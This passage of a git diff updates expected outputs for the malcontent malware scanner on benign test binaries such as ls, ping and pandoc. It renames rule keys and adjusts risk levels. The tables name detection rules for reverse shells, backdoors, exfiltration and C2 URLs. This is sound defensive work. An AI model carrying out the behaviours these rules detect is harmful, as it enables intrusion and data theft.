[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) | @@ -114,7 +115,6 @@ | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Chromium PDF Plugin](https://github.com/search?q=Chromium+PDF+Plugin&type=code)
[ContainsPlugins](https://github.com/search?q=ContainsPlugins&type=code)
[Failed to generate a plugin id](https://github.com/search?q=Failed+to+generate+a+plugin+id&type=code)
[GetPluginInfo](https://github.com/search?q=GetPluginInfo&type=code)
[GetPlugins](https://github.com/search?q=GetPlugins&type=code)
[If you want to block plugins](https://github.com/search?q=If+you+want+to+block+plugins&type=code)
[Is an accelerated plugin](https://github.com/search?q=Is+an+accelerated+plugin&type=code)
[LoadPluginsSoon](https://github.com/search?q=LoadPluginsSoon&type=code)
[No PPP_GetInterface in plugin library](https://github.com/search?q=No+PPP_GetInterface+in+plugin+library&type=code)
[No PPP_InitializeModule in plugin library](https://github.com/search?q=No+PPP_InitializeModule+in+plugin+library&type=code)
[OnPepperPluginCrashed](https://github.com/search?q=OnPepperPluginCrashed&type=code)
[OnPepperPluginHung](https://github.com/search?q=OnPepperPluginHung&type=code)
[OpenChannelToPepperPlugin](https://github.com/search?q=OpenChannelToPepperPlugin&type=code)
[Pepper Plugin Broker](https://github.com/search?q=Pepper+Plugin+Broker&type=code)
[PepperPluginInstance](https://github.com/search?q=PepperPluginInstance&type=code)
[Plugin Changed](https://github.com/search?q=Plugin+Changed&type=code)
[Plugin URL](https://github.com/search?q=Plugin+URL&type=code)
[Plugin doesn](https://github.com/search?q=Plugin+doesn&type=code)
[PluginArray](https://github.com/search?q=PluginArray&type=code)
[PluginContextSecurity](https://github.com/search?q=PluginContextSecurity&type=code)
[PluginData](https://github.com/search?q=PluginData&type=code)
[PluginDispatcher](https://github.com/search?q=PluginDispatcher&type=code)
[PluginLoad](https://github.com/search?q=PluginLoad&type=code)
[PluginPrivate](https://github.com/search?q=PluginPrivate&type=code)
[PluginRegistry](https://github.com/search?q=PluginRegistry&type=code)
[PluginResource](https://github.com/search?q=PluginResource&type=code)
[PluginService](https://github.com/search?q=PluginService&type=code)
[PluginSizeUpdated](https://github.com/search?q=PluginSizeUpdated&type=code)
[PpapiMsg_LoadPlugin](https://github.com/search?q=PpapiMsg_LoadPlugin&type=code)
[PpapiPluginMain](https://github.com/search?q=PpapiPluginMain&type=code)
[PpapiPluginMetrics](https://github.com/search?q=PpapiPluginMetrics&type=code)
[RemoveBrowserPluginEmbedder](https://github.com/search?q=RemoveBrowserPluginEmbedder&type=code)
[SendToPlugin](https://github.com/search?q=SendToPlugin&type=code)
[SetBrowserPluginGuest](https://github.com/search?q=SetBrowserPluginGuest&type=code)
[The plugin has not](https://github.com/search?q=The+plugin+has+not&type=code)
[Unable to create ppapi plugin process](https://github.com/search?q=Unable+to+create+ppapi+plugin+process&type=code)
[Unable to load plugin](https://github.com/search?q=Unable+to+load+plugin&type=code)
[Unable to load ppapi plugin](https://github.com/search?q=Unable+to+load+ppapi+plugin&type=code)
[allowNonEmptyNavigatorPlugins](https://github.com/search?q=allowNonEmptyNavigatorPlugins&type=code)
[as a plugin](https://github.com/search?q=as+a+plugin&type=code)
[browserplugin](https://github.com/search?q=browserplugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[html_plugin_element](https://github.com/search?q=html_plugin_element&type=code)
[kPluginObject](https://github.com/search?q=kPluginObject&type=code)
[loadplugin](https://github.com/search?q=loadplugin&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[page contains plugins](https://github.com/search?q=page+contains+plugins&type=code)
[pdf_internal_plugin_wrapper](https://github.com/search?q=pdf_internal_plugin_wrapper&type=code)
[pdf_view_plugin_base](https://github.com/search?q=pdf_view_plugin_base&type=code)
[pdf_view_web_plugin](https://github.com/search?q=pdf_view_web_plugin&type=code)
[pepper_hung_plugin_filter](https://github.com/search?q=pepper_hung_plugin_filter&type=code)
[pepper_webplugin_impl](https://github.com/search?q=pepper_webplugin_impl&type=code)
[plugin data](https://github.com/search?q=plugin+data&type=code)
[pluginObject](https://github.com/search?q=pluginObject&type=code)
[plugin_audio_thread](https://github.com/search?q=plugin_audio_thread&type=code)
[plugin_container_impl](https://github.com/search?q=plugin_container_impl&type=code)
[plugin_instance_impl](https://github.com/search?q=plugin_instance_impl&type=code)
[plugin_message_filter](https://github.com/search?q=plugin_message_filter&type=code)
[plugin_module](https://github.com/search?q=plugin_module&type=code)
[plugin_private_storage](https://github.com/search?q=plugin_private_storage&type=code)
[plugin_process_host](https://github.com/search?q=plugin_process_host&type=code)
[plugin_service_impl](https://github.com/search?q=plugin_service_impl&type=code)
[pluginprH](https://github.com/search?q=pluginprH&type=code)
[pluginsEnabled](https://github.com/search?q=pluginsEnabled&type=code)
[pluginspace](https://github.com/search?q=pluginspace&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[pluginurl](https://github.com/search?q=pluginurl&type=code)
[ppapi_plugin_main](https://github.com/search?q=ppapi_plugin_main&type=code)
[ppapi_plugin_process](https://github.com/search?q=ppapi_plugin_process&type=code)
[r PluginH](https://github.com/search?q=r+PluginH&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[security origin than your plugin](https://github.com/search?q=security+origin+than+your+plugin&type=code)
[strictMixedContentCheckingForPlugin](https://github.com/search?q=strictMixedContentCheckingForPlugin&type=code)
[suggestplugin](https://github.com/search?q=suggestplugin&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [CreateDirectoryAndGetEr](https://github.com/search?q=CreateDirectoryAndGetEr&type=code)
[CreateDirectoryResult](https://github.com/search?q=CreateDirectoryResult&type=code)
[createFolder](https://github.com/search?q=createFolder&type=code)
[mkdir](https://github.com/search?q=mkdir&type=code) | | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple index 216e3c50b..74979278e 100644 --- a/tests/linux/clean/containerd.simple +++ b/tests/linux/clean/containerd.simple @@ -23,8 +23,8 @@ data/encoding/json: low data/encoding/json_decode: low data/hash/md5: low discover/network/mac_address: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: medium discover/user/USER: low evasion/file/location/dev_mqueue: medium @@ -94,7 +94,6 @@ net/ip/icmp: medium net/ip/multicast_send: low net/ip/parse: medium net/ip/send_unicast: low -net/ip/spoof: medium net/resolve/hostname: low net/socket/listen: medium net/socket/local_addr: low diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md index 353ca110a..ca1168f2f 100644 --- a/tests/linux/clean/cpack.md +++ b/tests/linux/clean/cpack.md @@ -2,7 +2,7 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_php_url_with_question) | contains hardcoded endpoint with a question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | +| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code) | | MEDIUM | [crypto/file_encrypter](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/file-encrypter.yara#file_crypter) | Encrypts files | [cryptor](https://github.com/search?q=cryptor&type=code) | | MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | @@ -57,8 +57,8 @@ | LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [MD5_Final](https://github.com/search?q=MD5_Final&type=code)
[MD5_Init](https://github.com/search?q=MD5_Init&type=code)
[MD5_Update](https://github.com/search?q=MD5_Update&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple index da8770463..4d372b2a0 100644 --- a/tests/linux/clean/default_config.json.simple +++ b/tests/linux/clean/default_config.json.simple @@ -20,7 +20,8 @@ data/compression/bzip2: low data/compression/lzma: low data/compression/zstd: low data/encoding/base64: low -discover/system/network: medium +discover/multiple: medium +discover/system/dmesg: low discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium diff --git a/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple b/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple index c1ebf94c1..ee2b6461a 100644 --- a/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple +++ b/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple @@ -52,7 +52,7 @@ exec/shell/command: medium exec/shell/power: medium exfil/collection: medium impact/infection/infected: medium -impact/remote_access/backdoor: high +impact/remote_access/backdoor: medium impact/remote_access/implant: medium impact/remote_access/reverse_shell: high net/dns/txt: low diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple index 89da6b666..cb294eb02 100644 --- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple +++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple @@ -72,8 +72,7 @@ impact/exploit/known_s: medium impact/exploit/overflow_shellcode: high impact/infection/infected: medium impact/infection/worm: medium -impact/remote_access/backdoor: high -impact/remote_access/botnet: medium +impact/remote_access/backdoor: medium impact/remote_access/iptables: medium impact/remote_access/reverse_shell: high impact/remote_access/trojan: medium diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple index 6477bb5ab..34eb70185 100644 --- a/tests/linux/clean/kuma-cp.simple +++ b/tests/linux/clean/kuma-cp.simple @@ -33,8 +33,9 @@ discover/network/interface_list: medium discover/network/mac_address: medium discover/network/netstat: medium discover/processes/list: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/dmesg: low +discover/system/hostname: low discover/system/platform: medium discover/user/HOME: low discover/user/USER: low diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple index b73884649..d35fb32aa 100644 --- a/tests/linux/clean/ld-2.27.so.simple +++ b/tests/linux/clean/ld-2.27.so.simple @@ -2,7 +2,7 @@ anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium discover/process/runtime_deps: medium -discover/system/dev_full: medium +discover/system/dev_full: low evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/hijack_execution/etc_ld.so.preload: medium fs/path/etc: low diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple index 3a05df73d..b2dee9151 100644 --- a/tests/linux/clean/libgcj.so.17.0.0.simple +++ b/tests/linux/clean/libgcj.so.17.0.0.simple @@ -19,8 +19,8 @@ data/hash/sha256: low data/hash/whirlpool: medium discover/network/interface_list: medium discover/process/name: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple index 592fdca9a..86be6e324 100644 --- a/tests/linux/clean/libgcj.so.17.simple +++ b/tests/linux/clean/libgcj.so.17.simple @@ -19,8 +19,8 @@ data/hash/sha256: low data/hash/whirlpool: medium discover/network/interface_list: medium discover/process/name: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index fe3d4731f..ab48ef8b6 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -1,11 +1,11 @@ ## linux/clean/ls.x86_64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | diff --git a/tests/linux/clean/melange.simple b/tests/linux/clean/melange.simple index 4702fc3f4..65688de3f 100644 --- a/tests/linux/clean/melange.simple +++ b/tests/linux/clean/melange.simple @@ -36,8 +36,9 @@ discover/network/interface_list: medium discover/network/mac_address: medium discover/network/netstat: medium discover/processes/pgrep: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/dmesg: low +discover/system/hostname: low discover/system/platform: medium discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/clean/misp_sample.ndjson.log.simple b/tests/linux/clean/misp_sample.ndjson.log.simple index e318a6866..2e8742a3d 100644 --- a/tests/linux/clean/misp_sample.ndjson.log.simple +++ b/tests/linux/clean/misp_sample.ndjson.log.simple @@ -1,4 +1,4 @@ -# linux/clean/misp_sample.ndjson.log: critical +# linux/clean/misp_sample.ndjson.log: high 3P/threat_hunting/pastebin: medium c2/addr/ip: medium c2/tool_transfer/download: high @@ -7,6 +7,6 @@ evasion/rootkit/refs: high exec/shell/command: medium false-positives/filebeat: low impact/ransom/decryptor: medium -impact/remote_access/backdoor: high +impact/remote_access/backdoor: medium net/url/embedded: medium os/fd/multiplex: low diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple index b1601c57a..a2450ed9f 100644 --- a/tests/linux/clean/mongosh.simple +++ b/tests/linux/clean/mongosh.simple @@ -36,13 +36,13 @@ data/random/insecure: low discover/cloud/aws_metadata: low discover/cloud/google_metadata: low discover/group/lookup: medium -discover/network/interface_get: low +discover/network/interface: low discover/network/interface_list: medium discover/network/mac_address: medium discover/process/name: medium discover/process/parent: low discover/processes/list: medium -discover/system/hostname_get: low +discover/system/hostname: low discover/system/platform: medium discover/system/sysinfo: medium discover/user/HOME: low diff --git a/tests/linux/clean/opa.simple b/tests/linux/clean/opa.simple index 360cb7418..255d5ee87 100644 --- a/tests/linux/clean/opa.simple +++ b/tests/linux/clean/opa.simple @@ -22,8 +22,8 @@ data/encoding/json_encode: low data/hash/md5: low discover/cloud/aws_metadata: low discover/cloud/google_metadata: low -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: medium discover/system/sysinfo: medium discover/user/USER: low diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index cfcfe07e9..27105d8cd 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -69,7 +69,7 @@ | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | -| MEDIUM | [persist/cron/tab](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/crontab.yara#crontab_support) | supports crontab manipulation | [crontab](https://github.com/search?q=crontab&type=code) | +| MEDIUM | [persist/cron/tab](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/tab.yara#crontab_support) | supports crontab manipulation | [crontab](https://github.com/search?q=crontab&type=code) | | MEDIUM | [persist/kernel_module/module](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/kernel_module/module.yara#delete_module) | Unload Linux kernel module | [delete_module](https://github.com/search?q=delete_module&type=code) | | MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [PidFile](https://github.com/search?q=PidFile&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo](https://github.com/search?q=sudo&type=code) | @@ -90,8 +90,9 @@ | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | -| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| LOW | [discover/system/cpu](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | +| LOW | [discover/system/dmesg](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/dmesg.yara#dmesg) | accesses the kernel log ring buffer | [dmesg](https://github.com/search?q=dmesg&type=code) | +| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | | LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md index 9a3b9ab45..c5f8863cc 100644 --- a/tests/linux/clean/ping.x86_64.md +++ b/tests/linux/clean/ping.x86_64.md @@ -3,14 +3,14 @@ | RISK | KEY | DESCRIPTION | EVIDENCE | |--------|--------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Port](https://github.com/search?q=Port&type=code) | +| MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [id](https://github.com/search?q=id&type=code)
[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)
